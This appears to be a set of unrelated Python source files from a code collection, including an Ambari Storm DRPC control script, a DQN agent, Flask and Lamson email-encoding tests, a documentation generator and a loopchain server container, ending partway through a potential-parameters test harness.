from resource_management.libraries.functions import check_process_status
from resource_management.libraries.script import Script
from resource_management.libraries.functions import conf_select
from resource_management.libraries.functions import hdp_select
from resource_management.libraries.functions import format
from resource_management.core.resources.system import Execute
from resource_management.libraries.functions.version import compare_versions, format_hdp_stack_version
from storm import storm
from service import service
from service_check import ServiceCheck
from resource_management.libraries.functions.security_commons import build_expectations, \
cached_kinit_executor, get_params_from_filesystem, validate_security_config_properties, \
FILE_TYPE_JAAS_CONF
class DrpcServer(Script):
def get_stack_to_component(self):
return {"HDP": "storm-client"}
def install(self, env):
self.install_packages(env)
self.configure(env)
def configure(self, env):
import params
env.set_params(params)
storm()
def pre_upgrade_restart(self, env, upgrade_type=None):
import params
env.set_params(params)
if params.version and compare_versions(format_hdp_stack_version(params.version), '2.2.0.0') >= 0:
conf_select.select(params.stack_name, "storm", params.version)
hdp_select.select("storm-client", params.version)
def start(self, env, upgrade_type=None):
import params
env.set_params(params)
self.configure(env)
service("drpc", action="start")
def stop(self, env, upgrade_type=None):
import params
env.set_params(params)
service("drpc", action="stop")
def status(self, env):
import status_params
env.set_params(status_params)
check_process_status(status_params.pid_drpc)
def security_status(self, env):
import status_params
env.set_params(status_params)
if status_params.security_enabled:
# Expect the following files to be available in status_params.config_dir:
# storm_jaas.conf
try:
props_value_check = None
props_empty_check = ['StormServer/keyTab', 'StormServer/principal']
props_read_check = ['StormServer/keyTab']
storm_env_expectations = build_expectations('storm_jaas', props_value_check, props_empty_check,
props_read_check)
storm_expectations = {}
storm_expectations.update(storm_env_expectations)
security_params = get_params_from_filesystem(status_params.conf_dir,
{'storm_jaas.conf': FILE_TYPE_JAAS_CONF})
result_issues = validate_security_config_properties(security_params, storm_expectations)
if not result_issues: # If all validations passed successfully
# Double check the dict before calling execute
if ( 'storm_jaas' not in security_params
or 'StormServer' not in security_params['storm_jaas']
or 'keyTab' not in security_params['storm_jaas']['StormServer']
or 'principal' not in security_params['storm_jaas']['StormServer']):
self.put_structured_out({"securityState": "ERROR"})
            self.put_structured_out({"securityIssuesFound": "Keytab file or principal are not set properly."})
return
cached_kinit_executor(status_params.kinit_path_local,
status_params.storm_user,
security_params['storm_jaas']['StormServer']['keyTab'],
security_params['storm_jaas']['StormServer']['principal'],
status_params.hostname,
status_params.tmp_dir)
self.put_structured_out({"securityState": "SECURED_KERBEROS"})
else:
issues = []
for cf in result_issues:
issues.append("Configuration file %s did not pass the validation. Reason: %s" % (cf, result_issues[cf]))
self.put_structured_out({"securityIssuesFound": ". ".join(issues)})
self.put_structured_out({"securityState": "UNSECURED"})
except Exception as e:
self.put_structured_out({"securityState": "ERROR"})
self.put_structured_out({"securityStateErrorInfo": str(e)})
else:
self.put_structured_out({"securityState": "UNSECURED"})
if __name__ == "__main__":
DrpcServer().execute()
|
py | 7dfa0de2286a470de79d0ee3a24fdcc6cbd7d1d4 | #######################################################################
# Copyright (C) 2017 Shangtong Zhang([email protected]) #
# Permission given to modify the code as long as you keep this #
# declaration at the top #
#######################################################################
from network import *
from component import *
from utils import *
import numpy as np
import time
import os
import pickle
import torch
# This is an HRA DQN with irrelevant features removed
class MSDQNAgent:
def __init__(self, config):
self.config = config
self.learning_network = config.network_fn(config.optimizer_fn)
self.target_network = config.network_fn(config.optimizer_fn)
self.target_network.load_state_dict(self.learning_network.state_dict())
self.task = config.task_fn()
self.replay = config.replay_fn()
self.policy = config.policy_fn()
self.total_steps = 0
def episode(self, deterministic=False):
episode_start_time = time.time()
state = self.task.reset()
total_reward = 0.0
steps = 0
while True:
value = self.learning_network.predict(np.stack([state]), True)
value = value.cpu().data.numpy().flatten()
if deterministic:
action = np.argmax(value)
elif self.total_steps < self.config.exploration_steps:
action = np.random.randint(0, len(value))
else:
action = self.policy.sample(value)
next_state, reward, done, info = self.task.step(action)
done = (done or (self.config.max_episode_length and steps > self.config.max_episode_length))
if not deterministic:
self.replay.feed([state, action, reward, next_state, int(done)])
self.total_steps += 1
total_reward += np.sum(reward * self.config.reward_weight)
steps += 1
state = next_state
if done:
break
if not deterministic and self.total_steps > self.config.exploration_steps:
experiences = self.replay.sample()
states, actions, rewards, next_states, terminals = experiences
if self.config.hybrid_reward:
q_next = self.target_network.predict(next_states, False)
target = []
for q_next_ in q_next:
if self.config.target_type == self.config.q_target:
target.append(q_next_.detach().max(1)[0])
elif self.config.target_type == self.config.expected_sarsa_target:
target.append(q_next_.detach().mean(1))
target = torch.cat(target, dim=1).detach()
terminals = self.learning_network.to_torch_variable(terminals).unsqueeze(1)
rewards = self.learning_network.to_torch_variable(rewards)
target = self.config.discount * target * (1 - terminals.expand_as(target))
target.add_(rewards)
q = self.learning_network.predict(states, False)
q_action = []
actions = self.learning_network.to_torch_variable(actions, 'int64').unsqueeze(1)
for q_ in q:
q_action.append(q_.gather(1, actions))
q_action = torch.cat(q_action, dim=1)
loss = self.learning_network.criterion(q_action, target)
else:
q_next = self.target_network.predict(next_states, True).detach()
if self.config.double_q:
_, best_actions = self.learning_network.predict(next_states).detach().max(1)
q_next = q_next.gather(1, best_actions)
else:
q_next, _ = q_next.max(1)
terminals = self.learning_network.to_torch_variable(terminals).unsqueeze(1)
rewards = np.sum(rewards * self.config.reward_weight, axis=1)
rewards = self.learning_network.to_torch_variable(rewards).unsqueeze(1)
q_next = self.config.discount * q_next * (1 - terminals)
q_next.add_(rewards)
actions = self.learning_network.to_torch_variable(actions, 'int64').unsqueeze(1)
q = self.learning_network.predict(states, True)
q = q.gather(1, actions)
loss = self.learning_network.criterion(q, q_next)
self.learning_network.zero_grad()
loss.backward()
self.learning_network.optimizer.step()
if not deterministic and self.total_steps % self.config.target_network_update_freq == 0:
self.target_network.load_state_dict(self.learning_network.state_dict())
if not deterministic and self.total_steps > self.config.exploration_steps:
self.policy.update_epsilon()
episode_time = time.time() - episode_start_time
self.config.logger.debug('episode steps %d, episode time %f, time per step %f' %
(steps, episode_time, episode_time / float(steps)))
return total_reward, steps
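# --- Illustrative driver (not part of the original file) ---
# The agent is configured entirely through `config`: `network_fn`, `optimizer_fn`,
# `task_fn`, `replay_fn` and `policy_fn` are factories supplied by the surrounding
# project (imported above via `network`, `component` and `utils`). Assuming such a
# config has been built, training is just repeated calls to episode(), e.g.:
#   agent = MSDQNAgent(config)
#   while agent.total_steps < max_steps:      # max_steps chosen by the caller
#       reward, steps = agent.episode()
#       config.logger.info('reward %f in %d steps' % (reward, steps))
#   agent.episode(deterministic=True)         # greedy evaluation pass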
|
py | 7dfa0e0584de804f46d0c014eae698b615ac3dfd | # coding: utf-8
#
# Copyright 2022 :Barry-Thomas-Paul: Moss
#
# Licensed under the Apache License, Version 2.0 (the "License")
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http: // www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
# Exception Class
# this is a auto generated file generated by Cheetah
# Namespace: com.sun.star.document
# Libre Office Version: 7.3
from typing import TYPE_CHECKING
from ooo.oenv.env_const import UNO_ENVIRONMENT, UNO_RUNTIME
if (not TYPE_CHECKING) and UNO_RUNTIME and UNO_ENVIRONMENT:
import uno
def _get_class():
orig_init = None
ordered_keys = ('Message', 'Context')
def init(self, *args, **kwargs):
if len(kwargs) == 0 and len(args) == 1 and getattr(args[0], "__class__", None) == self.__class__:
orig_init(self, args[0])
return
kargs = kwargs.copy()
for i, arg in enumerate(args):
kargs[ordered_keys[i]] = arg
orig_init(self, **kargs)
type_name = 'com.sun.star.document.EmptyUndoStackException'
ex = uno.getClass(type_name)
ex.__ooo_ns__ = 'com.sun.star.document'
ex.__ooo_full_ns__= type_name
ex.__ooo_type_name__ = 'exception'
orig_init = ex.__init__
ex.__init__ = init
return ex
EmptyUndoStackException = _get_class()
else:
from ...lo.document.empty_undo_stack_exception import EmptyUndoStackException as EmptyUndoStackException
__all__ = ['EmptyUndoStackException']
|
py | 7dfa0ef4b7969aa144bf8eb4af94eae66c82a60d | import os
import flaskr
import unittest
import tempfile
class FlaskrTestCase(unittest.TestCase):
def setUp(self):
self.db_fd, flaskr.app.config['DATABASE'] = tempfile.mkstemp()
flaskr.app.config['TESTING'] = True
self.app = flaskr.app.test_client()
flaskr.init_db()
def tearDown(self):
os.close(self.db_fd)
os.unlink(flaskr.app.config['DATABASE'])
def test_empty_db(self):
rv = self.app.get('/')
assert b'No entries here so far' in rv.data
def login(self, username, password):
return self.app.post('/login', data=dict(
username=username,
password=password
), follow_redirects=True)
def logout(self):
return self.app.get('/logout', follow_redirects=True)
def test_login_logout(self):
rv = self.login('admin', 'default')
assert b'You were logged in' in rv.data
rv = self.logout()
assert b'You were logged out' in rv.data
rv = self.login('adminx', 'default')
assert b'Invalid username' in rv.data
rv = self.login('admin', 'defaultx')
assert b'Invalid password' in rv.data
def test_messages(self):
self.login('admin', 'default')
rv = self.app.post('/add', data=dict(
title='<Hello>',
text='<strong>HTML</strong> allowed here'
), follow_redirects=True)
assert b'No entries here so far' not in rv.data
assert b'<Hello>' in rv.data
assert b'<strong>HTML</strong> allowed here' in rv.data
if __name__ == '__main__':
unittest.main()
|
py | 7dfa0efa264da9ffeea368bebbf9e2e126bd9c0f | import pathlib
import shutil
import keras_autodoc
PAGES = {
"project.md": {
"connection": ["hsfs.connection.Connection"],
"connection_methods": keras_autodoc.get_methods(
"hsfs.connection.Connection", exclude=["connection"]
),
},
"feature_store.md": {
"fs_get": ["hsfs.connection.Connection.get_feature_store"],
"fs_properties": keras_autodoc.get_properties(
"hsfs.feature_store.FeatureStore"
),
"fs_methods": keras_autodoc.get_methods(
"hsfs.feature_store.FeatureStore", exclude=["from_response_json"]
),
},
"feature.md": {
"feature": ["hsfs.feature.Feature"],
"feature_properties": keras_autodoc.get_properties("hsfs.feature.Feature"),
"feature_methods": keras_autodoc.get_methods(
"hsfs.feature.Feature", exclude=["from_response_json", "to_dict"]
),
},
"feature_group.md": {
"fg_create": ["hsfs.feature_store.FeatureStore.create_feature_group"],
"fg_get": ["hsfs.feature_store.FeatureStore.get_feature_group"],
"fg_properties": keras_autodoc.get_properties(
"hsfs.feature_group.FeatureGroup"
),
"fg_methods": keras_autodoc.get_methods(
"hsfs.feature_group.FeatureGroup",
exclude=[
"from_response_json",
"update_from_response_json",
"json",
"to_dict",
],
),
},
"training_dataset.md": {
"td_create": ["hsfs.feature_store.FeatureStore.create_training_dataset"],
"td_get": ["hsfs.feature_store.FeatureStore.get_training_dataset"],
"td_properties": keras_autodoc.get_properties(
"hsfs.training_dataset.TrainingDataset"
),
"td_methods": keras_autodoc.get_methods(
"hsfs.training_dataset.TrainingDataset",
exclude=[
"from_response_json",
"update_from_response_json",
"json",
"to_dict",
],
),
"tf_record_dataset": ["hsfs.core.tfdata_engine.TFDataEngine.tf_record_dataset"],
"tf_csv_dataset": ["hsfs.core.tfdata_engine.TFDataEngine.tf_csv_dataset"],
},
"storage_connector.md": {
"sc_get": [
"hsfs.feature_store.FeatureStore.get_storage_connector",
"hsfs.feature_store.FeatureStore.get_online_storage_connector",
],
"sc_methods": keras_autodoc.get_methods(
"hsfs.storage_connector.StorageConnector", exclude=["from_response_json"]
),
"sc_properties": keras_autodoc.get_properties(
"hsfs.storage_connector.StorageConnector"
),
},
"query_vs_dataframe.md": {
"query_methods": keras_autodoc.get_methods("hsfs.constructor.query.Query"),
"query_properties": keras_autodoc.get_properties(
"hsfs.constructor.query.Query"
),
},
"statistics.md": {
"statistics_config": ["hsfs.statistics_config.StatisticsConfig"],
"statistics_config_properties": keras_autodoc.get_properties(
"hsfs.statistics_config.StatisticsConfig"
),
},
"feature_validation.md": {
"rule": ["hsfs.rule.Rule"],
"rule_properties": keras_autodoc.get_properties("hsfs.rule.Rule"),
"ruledefinition": ["hsfs.ruledefinition.RuleDefinition"],
"ruledefinition_getall": ["hsfs.connection.Connection.get_rules"],
"ruledefinition_get": ["hsfs.connection.Connection.get_rule"],
"ruledefinition_properties": keras_autodoc.get_properties(
"hsfs.ruledefinition.RuleDefinition"
),
"expectation": ["hsfs.expectation.Expectation"],
"expectation_properties": keras_autodoc.get_properties(
"hsfs.expectation.Expectation"
),
"expectation_methods": keras_autodoc.get_methods(
"hsfs.expectation.Expectation",
exclude=[
"from_response_json",
"update_from_response_json",
"json",
"to_dict",
],
),
"expectation_create": ["hsfs.feature_store.FeatureStore.create_expectation"],
"expectation_get": ["hsfs.feature_store.FeatureStore.get_expectation"],
"expectation_getall": ["hsfs.feature_store.FeatureStore.get_expectations"],
"validation_result": ["hsfs.validation_result.ValidationResult"],
"validation_result_properties": keras_autodoc.get_properties(
"hsfs.validation_result.ValidationResult"
),
"validate": ["hsfs.feature_group.FeatureGroup.validate"],
"validation_result_get": ["hsfs.feature_group.FeatureGroup.get_validations"],
},
"tags.md": {
"fg_tag_add": ["hsfs.feature_group.FeatureGroupBase.add_tag"],
"fg_tag_get": ["hsfs.feature_group.FeatureGroupBase.get_tag"],
"fg_tag_get_all": ["hsfs.feature_group.FeatureGroupBase.get_tags"],
"fg_tag_delete": ["hsfs.feature_group.FeatureGroupBase.delete_tag"],
"td_tag_add": ["hsfs.training_dataset.TrainingDataset.add_tag"],
"td_tag_get": ["hsfs.training_dataset.TrainingDataset.get_tag"],
"td_tag_get_all": ["hsfs.training_dataset.TrainingDataset.get_tags"],
"td_tag_delete": ["hsfs.training_dataset.TrainingDataset.delete_tag"],
},
"api/connection_api.md": {
"connection": ["hsfs.connection.Connection"],
"connection_properties": keras_autodoc.get_properties(
"hsfs.connection.Connection"
),
"connection_methods": keras_autodoc.get_methods("hsfs.connection.Connection"),
},
"api/feature_store_api.md": {
"fs": ["hsfs.feature_store.FeatureStore"],
"fs_get": ["hsfs.connection.Connection.get_feature_store"],
"fs_properties": keras_autodoc.get_properties(
"hsfs.feature_store.FeatureStore"
),
"fs_methods": keras_autodoc.get_methods("hsfs.feature_store.FeatureStore"),
},
"api/feature_group_api.md": {
"fg": ["hsfs.feature_group.FeatureGroup"],
"fg_create": ["hsfs.feature_store.FeatureStore.create_feature_group"],
"fg_get": ["hsfs.feature_store.FeatureStore.get_feature_group"],
"fg_properties": keras_autodoc.get_properties(
"hsfs.feature_group.FeatureGroup"
),
"fg_methods": keras_autodoc.get_methods("hsfs.feature_group.FeatureGroup"),
},
"api/training_dataset_api.md": {
"td": ["hsfs.training_dataset.TrainingDataset"],
"td_create": ["hsfs.feature_store.FeatureStore.create_training_dataset"],
"td_get": ["hsfs.feature_store.FeatureStore.get_training_dataset"],
"td_properties": keras_autodoc.get_properties(
"hsfs.training_dataset.TrainingDataset"
),
"td_methods": keras_autodoc.get_methods(
"hsfs.training_dataset.TrainingDataset"
),
},
"api/feature_api.md": {
"feature": ["hsfs.feature.Feature"],
"feature_properties": keras_autodoc.get_properties("hsfs.feature.Feature"),
"feature_methods": keras_autodoc.get_methods("hsfs.feature.Feature"),
},
"api/storage_connector_api.md": {
"sc_get": [
"hsfs.feature_store.FeatureStore.get_storage_connector",
"hsfs.feature_store.FeatureStore.get_online_storage_connector",
],
"sc_methods": keras_autodoc.get_methods(
"hsfs.storage_connector.StorageConnector"
),
"sc_properties": keras_autodoc.get_properties(
"hsfs.storage_connector.StorageConnector"
),
},
"api/statistics_config_api.md": {
"statistics_config": ["hsfs.statistics_config.StatisticsConfig"],
"statistics_config_properties": keras_autodoc.get_properties(
"hsfs.statistics_config.StatisticsConfig"
),
},
"api/rule_api.md": {
"rule": ["hsfs.rule.Rule"],
"rule_properties": keras_autodoc.get_properties("hsfs.rule.Rule"),
},
"api/rule_definition_api.md": {
"ruledefinition": ["hsfs.ruledefinition.RuleDefinition"],
"ruledefinition_getall": ["hsfs.connection.Connection.get_rules"],
"ruledefinition_get": ["hsfs.connection.Connection.get_rule"],
"ruledefinition_properties": keras_autodoc.get_properties(
"hsfs.ruledefinition.RuleDefinition"
),
},
"api/expectation_api.md": {
"expectation": ["hsfs.expectation.Expectation"],
"expectation_properties": keras_autodoc.get_properties(
"hsfs.expectation.Expectation"
),
"expectation_methods": keras_autodoc.get_methods(
"hsfs.expectation.Expectation",
exclude=[
"from_response_json",
"update_from_response_json",
"json",
"to_dict",
],
),
"expectation_create": ["hsfs.feature_store.FeatureStore.create_expectation"],
"expectation_get": ["hsfs.feature_store.FeatureStore.get_expectation"],
"expectation_getall": ["hsfs.feature_store.FeatureStore.get_expectations"],
},
"api/validation_api.md": {
"validation_result": ["hsfs.validation_result.ValidationResult"],
"validation_result_properties": keras_autodoc.get_properties(
"hsfs.validation_result.ValidationResult"
),
"validate": ["hsfs.feature_group.FeatureGroup.validate"],
"validation_result_get": ["hsfs.feature_group.FeatureGroup.get_validations"],
},
}
hsfs_dir = pathlib.Path(__file__).resolve().parents[0]
def generate(dest_dir):
doc_generator = keras_autodoc.DocumentationGenerator(
PAGES,
project_url="https://github.com/logicalclocks/feature-store-api/blob/master/python",
template_dir="./docs/templates",
titles_size="###",
extra_aliases={
"hsfs.core.query.Query": "hsfs.Query",
"hsfs.storage_connector.StorageConnector": "hsfs.StorageConnector",
"hsfs.statistics_config.StatisticsConfig": "hsfs.StatisticsConfig",
"hsfs.training_dataset_feature.TrainingDatasetFeature": "hsfs.TrainingDatasetFeature",
"pandas.core.frame.DataFrame": "pandas.DataFrame",
},
max_signature_line_length=100,
)
shutil.copyfile(hsfs_dir / "CONTRIBUTING.md", dest_dir / "CONTRIBUTING.md")
shutil.copyfile(hsfs_dir / "README.md", dest_dir / "index.md")
doc_generator.generate(dest_dir / "generated")
if __name__ == "__main__":
generate(hsfs_dir / "docs")
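# Illustrative note (an assumption about keras_autodoc's template convention,
# not part of the original script): each key in PAGES is expected to match a
# {{placeholder}} inside the corresponding template under ./docs/templates.
# For example, a hypothetical docs/templates/api/feature_api.md could contain:
#
#   # Feature
#   {{feature}}
#   ## Properties
#   {{feature_properties}}
#   ## Methods
#   {{feature_methods}}
#
# Running this script directly then renders the filled pages into
# docs/generated via generate() above.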
|
py | 7dfa0f5351b7b3a6dd32dd3187d8b160bdf68d33 | # Copyright 2017 theloop, Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""A module for containers on the loopchain """
import logging
import grpc
from enum import Enum
from concurrent import futures
from loopchain.rest_server import RestServer, RestServerRS
from loopchain import configure as conf
from loopchain.baseservice import CommonProcess
from loopchain.protos import loopchain_pb2_grpc
class ServerType(Enum):
REST_RS = 1
REST_PEER = 2
GRPC = 3
class Container(CommonProcess):
def __init__(self, port, type=ServerType.GRPC, peer_ip=None):
CommonProcess.__init__(self)
self._port = port
self._type = type
self._peer_ip = peer_ip
def run(self, conn):
logging.debug("Container run...")
if self._type == ServerType.GRPC:
server = grpc.server(futures.ThreadPoolExecutor(max_workers=conf.MAX_WORKERS))
loopchain_pb2_grpc.add_ContainerServicer_to_server(self, server)
server.add_insecure_port('[::]:' + str(self._port))
elif self._type == ServerType.REST_PEER:
server = RestServer(self._port, self._peer_ip)
else:
server = RestServerRS(self._port)
server.start()
command = None
while command != "quit":
try:
                command, param = conn.recv() # Blocks here until something arrives on the Queue, so no sleep is needed.
logging.debug("Container got: " + str(param))
except Exception as e:
logging.warning("Container conn.recv() error: " + str(e))
if self._type == ServerType.GRPC:
server.stop(0)
else:
server.stop()
logging.info("Server Container Ended.")
|
py | 7dfa0f6f2b0a3efd37074b95b1df97e91d805174 | from __future__ import with_statement
from nose.tools import *
import re
import os
from lamson import encoding, mail
import mailbox
import email
from email import encoders
from email.utils import parseaddr
from mock import *
import chardet
BAD_HEADERS = [
u'"\u8003\u53d6\u5206\u4eab" <[email protected]>'.encode('utf-8'),
'"=?windows-1251?B?RXhxdWlzaXRlIFJlcGxpY2E=?="\n\t<[email protected]>',
'=?iso-2022-jp?B?Zmlicm91c19mYXZvcmF0ZUB5YWhvby5jby5qcA==?=<[email protected]>',
'=?windows-1252?Q?Global_Leadership_in_HandCare_-_Consumer,\n\t_Professional_and_Industrial_Products_OTC_:_FLKI?=',
'=?windows-1252?q?Global_Leadership_in_Handcare_-_Consumer, _Auto,\n\t_Professional_&_Industrial_Products_-_OTC_:_FLKI?=',
'I am just normal.',
'=?koi8-r?B?WW91ciBtYW6ScyBzdGFtaW5hIHdpbGwgY29tZSBiYWNrIHRvIHlvdSBs?=\n\t=?koi8-r?B?aWtlIGEgYm9vbWVyYW5nLg==?=',
'=?koi8-r?B?WW91IGNhbiBiZSBvbiB0b3AgaW4gYmVkcm9vbSBhZ2FpbiCWIGp1c3Qg?=\n\t=?koi8-r?B?YXNrIHVzIGZvciBhZHZpY2Uu?=',
'"=?koi8-r?B?5MXMz9DSz8na18/E09TXzw==?=" <[email protected]>',
'=?utf-8?b?IumrlOiCsuWckuWNgOermSDihpIg6ZW35bqa6Yar6Zmi56uZIOKGkiDmlofljJbk?=\n =?utf-8?b?uInot6/nq5kiIDx2Z3hkcmp5Y2lAZG5zLmh0Lm5ldC50dz4=?=',
'=?iso-8859-1?B?SOlhdnkgTel05WwgVW7uY/hk?=\n\t=?iso-8859-1?Q?=E9?=',
]
DECODED_HEADERS = encoding.header_from_mime_encoding(BAD_HEADERS)
NORMALIZED_HEADERS = [encoding.header_to_mime_encoding(x) for x in DECODED_HEADERS]
def test_MailBase():
the_subject = u'p\xf6stal'
m = encoding.MailBase()
m['To'] = "testing@localhost"
m['Subject'] = the_subject
assert m['To'] == "testing@localhost"
assert m['TO'] == m['To']
assert m['to'] == m['To']
assert m['Subject'] == the_subject
assert m['subject'] == m['Subject']
assert m['sUbjeCt'] == m['Subject']
msg = encoding.to_message(m)
m2 = encoding.from_message(msg)
assert_equal(len(m), len(m2))
for k in m:
assert m[k] == m2[k], "%s: %r != %r" % (k, m[k], m2[k])
for k in m.keys():
assert k in m
del m[k]
assert not k in m
def test_header_to_mime_encoding():
for i, header in enumerate(DECODED_HEADERS):
assert_equal(NORMALIZED_HEADERS[i], encoding.header_to_mime_encoding(header))
def test_dumb_shit():
# this is a sample of possibly the worst case Mutt can produce
idiot = '=?iso-8859-1?B?SOlhdnkgTel05WwgVW7uY/hk?=\n\t=?iso-8859-1?Q?=E9?='
should_be = u'H\xe9avy M\xe9t\xe5l Un\xeec\xf8d\xe9'
assert_equal(encoding.header_from_mime_encoding(idiot), should_be)
def test_header_from_mime_encoding():
assert not encoding.header_from_mime_encoding(None)
assert_equal(len(BAD_HEADERS), len(encoding.header_from_mime_encoding(BAD_HEADERS)))
for i, header in enumerate(BAD_HEADERS):
assert_equal(DECODED_HEADERS[i], encoding.header_from_mime_encoding(header))
def test_to_message_from_message_with_spam():
mb = mailbox.mbox("tests/spam")
fails = 0
total = 0
for msg in mb:
try:
m = encoding.from_message(msg)
out = encoding.to_message(m)
assert repr(out)
m2 = encoding.from_message(out)
for k in m:
if '@' in m[k]:
assert_equal(parseaddr(m[k]), parseaddr(m2[k]))
else:
assert m[k].strip() == m2[k].strip(), "%s: %r != %r" % (k, m[k], m2[k])
assert not m[k].startswith(u"=?")
assert not m2[k].startswith(u"=?")
assert m.body == m2.body, "Bodies don't match"
assert_equal(len(m.parts), len(m2.parts), "Not the same number of parts.")
for i, part in enumerate(m.parts):
assert part.body == m2.parts[i].body, "Part %d isn't the same: %r \nvs\n. %r" % (i, part.body, m2.parts[i].body)
total += 1
        except encoding.EncodingError as exc:
fails += 1
assert fails/total < 0.01, "There were %d failures out of %d total." % (fails, total)
def test_to_file_from_file():
mb = mailbox.mbox("tests/spam")
msg = encoding.from_message(mb[0])
outfile = "run/encoding_test.msg"
with open(outfile, 'w') as outfp:
encoding.to_file(msg, outfp)
with open(outfile) as outfp:
msg2 = encoding.from_file(outfp)
outdata = open(outfile).read()
assert_equal(len(msg), len(msg2))
os.unlink(outfile)
def test_guess_encoding_and_decode():
for header in DECODED_HEADERS:
try:
encoding.guess_encoding_and_decode('ascii', header.encode('utf-8'))
except encoding.EncodingError:
pass
def test_attempt_decoding():
for header in DECODED_HEADERS:
encoding.attempt_decoding('ascii', header.encode('utf-8'))
def test_properly_decode_header():
for i, header in enumerate(BAD_HEADERS):
parsed = encoding.properly_decode_header(header)
assert_equal(DECODED_HEADERS[i], parsed)
def test_headers_round_trip():
# round trip the headers to make sure they convert reliably back and forth
for header in BAD_HEADERS:
original = encoding.header_from_mime_encoding(header)
assert original
assert "=?" not in original and "?=" not in original, "Didn't decode: %r" % (encoding.SCANNER.scan(header),)
encoded = encoding.header_to_mime_encoding(original)
assert encoded
return_original = encoding.header_from_mime_encoding(encoded)
assert_equal(original, return_original)
return_encoded = encoding.header_to_mime_encoding(return_original)
assert_equal(encoded, return_encoded)
def test_MIMEPart():
text1 = encoding.MIMEPart("text/plain")
text1.set_payload("The first payload.")
text2 = encoding.MIMEPart("text/plain")
text2.set_payload("The second payload.")
image_data = open("tests/lamson.png").read()
img1 = encoding.MIMEPart("image/png")
img1.set_payload(image_data)
img1.set_param('attachment','', header='Content-Disposition')
img1.set_param('filename','lamson.png', header='Content-Disposition')
encoders.encode_base64(img1)
multi = encoding.MIMEPart("multipart/mixed")
for x in [text1, text2, img1]:
multi.attach(x)
mail = encoding.from_message(multi)
assert mail.parts[0].body == "The first payload."
assert mail.parts[1].body == "The second payload."
assert mail.parts[2].body == image_data
encoding.to_message(mail)
@patch('chardet.detect', new=Mock())
@raises(encoding.EncodingError)
def test_guess_encoding_fails_completely():
chardet.detect.return_value = {'encoding': None, 'confidence': 0.0}
encoding.guess_encoding_and_decode('ascii', 'some data', errors='strict')
def test_attach_text():
mail = encoding.MailBase()
mail.attach_text("This is some text.", 'text/plain')
msg = encoding.to_message(mail)
assert msg.get_payload(0).get_payload() == "This is some text."
assert encoding.to_string(mail)
mail.attach_text("<html><body><p>Hi there.</p></body></html>", "text/html")
msg = encoding.to_message(mail)
assert len(msg.get_payload()) == 2
assert encoding.to_string(mail)
def test_attach_file():
mail = encoding.MailBase()
png = open("tests/lamson.png").read()
mail.attach_file("lamson.png", png, "image/png", "attachment")
msg = encoding.to_message(mail)
payload = msg.get_payload(0)
assert payload.get_payload(decode=True) == png
assert payload.get_filename() == "lamson.png", payload.get_filename()
def test_content_encoding_headers_are_maintained():
inmail = encoding.from_file(open("tests/signed.msg"))
ctype, ctype_params = inmail.content_encoding['Content-Type']
assert_equal(ctype, 'multipart/signed')
# these have to be maintained
for key in ['protocol', 'micalg']:
assert key in ctype_params
# these get removed
for key in encoding.CONTENT_ENCODING_REMOVED_PARAMS:
assert key not in ctype_params
outmsg = encoding.to_message(inmail)
ctype, ctype_params = encoding.parse_parameter_header(outmsg, 'Content-Type')
for key in ['protocol', 'micalg']:
assert key in ctype_params, key
def test_odd_content_type_with_charset():
mail = encoding.MailBase()
mail.body = u"p\xf6stal".encode('utf-8')
mail.content_encoding['Content-Type'] = ('application/plain', {'charset': 'utf-8'})
msg = encoding.to_string(mail)
assert msg
def test_specially_borked_lua_message():
assert encoding.from_file(open("tests/borked.msg"))
def raises_TypeError(*args):
raise TypeError()
@patch('lamson.encoding.MIMEPart.__init__')
@raises(encoding.EncodingError)
def test_to_message_encoding_error(mp_init):
mp_init.side_effect = raises_TypeError
test = encoding.from_file(open("tests/borked.msg"))
msg = encoding.to_message(test)
def raises_UnicodeError(*args):
raise UnicodeError()
@raises(encoding.EncodingError)
def test_guess_encoding_and_decode_unicode_error():
data = Mock()
data.__str__ = Mock()
data.__str__.return_value = u"\0\0"
data.decode.side_effect = raises_UnicodeError
encoding.guess_encoding_and_decode("ascii", data)
def test_attempt_decoding_with_bad_encoding_name():
assert_equal("test", encoding.attempt_decoding("asdfasdf", "test"))
@raises(encoding.EncodingError)
def test_apply_charset_to_header_with_bad_encoding_char():
encoding.apply_charset_to_header('ascii', 'X', 'bad')
def test_odd_roundtrip_bug():
decoded_addrs=[u'"\u0414\u0435\u043b\u043e\u043f\u0440\u043e\u0438\u0437\u0432\u043e\u0434\u0441\u0442\u0432\u043e" <[email protected]>',
u'"\u8003\u53d6\u5206\u4eab" <[email protected]>',
u'"Exquisite Replica"\n\t<[email protected]>',]
for decoded in decoded_addrs:
encoded = encoding.header_to_mime_encoding(decoded)
assert '<' in encoded and '"' in encoded, "Address wasn't encoded correctly:\n%s" % encoded
|
py | 7dfa109ce8d225afee512d9536199343d4bb9d44 | import pytest
import os
from collections import OrderedDict
# <----- TESTING HARNESS VARIABLES
Ni_eam_potential_definition = OrderedDict()
Ni_eam_potential_definition['potential_type'] = 'eam'
Ni_eam_potential_definition['setfl_filename']=None
Ni_eam_potential_definition['pair_type']='morse'
Ni_eam_potential_definition['density_type']='eam_dens_exp'
Ni_eam_potential_definition['embedding_type']='eam_embed_universal'
Ni_eam_potential_definition['N_r'] = 2000
Ni_eam_potential_definition['r_max'] = 10.0
Ni_eam_potential_definition['r_cut'] = 8.9
Ni_eam_potential_definition['N_rho'] = 2000
Ni_eam_potential_definition['rho_max'] = 10.0
Ni_eam_potential_definition['symbols'] = ['Ni']
Ni_eam_parameters = OrderedDict()
Ni_eam_parameters['p_NiNi_D0'] = 0.001114
Ni_eam_parameters['p_NiNi_a'] = 3.429506
Ni_eam_parameters['p_NiNi_r0'] = 2.6813
Ni_eam_parameters['d_Ni_rho0'] = 10.0
Ni_eam_parameters['d_Ni_beta'] = 5.0
Ni_eam_parameters['d_Ni_r0'] = 2.0
Ni_eam_parameters['e_Ni_F0'] = 4.10341782e-3
